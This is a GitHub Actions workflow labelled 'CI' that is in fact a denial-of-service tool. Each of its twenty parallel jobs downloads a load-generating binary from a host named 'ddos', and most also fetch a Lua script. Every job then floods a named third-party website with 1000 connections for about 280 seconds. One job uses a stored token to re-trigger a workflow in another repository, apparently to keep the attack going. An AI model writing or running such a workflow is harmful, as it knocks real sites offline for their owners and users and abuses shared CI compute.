name: CI

on:
  push:
    branches: [ main ]
  workflow_dispatch:

jobs:
  build1:
    runs-on: ubuntu-latest
    env:
      GITHUB_TOKEN: ${{ secrets.AUTH_TOKEN }}
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          chmod 777 wrk
          ./wrk -c1000 -t300 -d280s https://buyaz.tech/search-order-by-browser
          curl -X POST -H "Authorization: token $GITHUB_TOKEN" -H "Accept: application/vnd.github.v3+json" -d '{"ref": "main"}' https://api.github.com/repos/niniubiwoc/run-script-action/actions/workflows/blank.yml/dispatches
  build2:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build3:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build4:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build5:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build6:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build7:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build8:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build9:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build10:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build11:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build12:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build13:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build14:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build15:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build16:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build17:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build18:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build19:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
  build20:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://ddos.nms.workers.dev/wrk
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/post.lua
          chmod 777 wrk
          ./wrk -c1000 -t300 -d279s https://buyaz.tech/search-order-by-browser
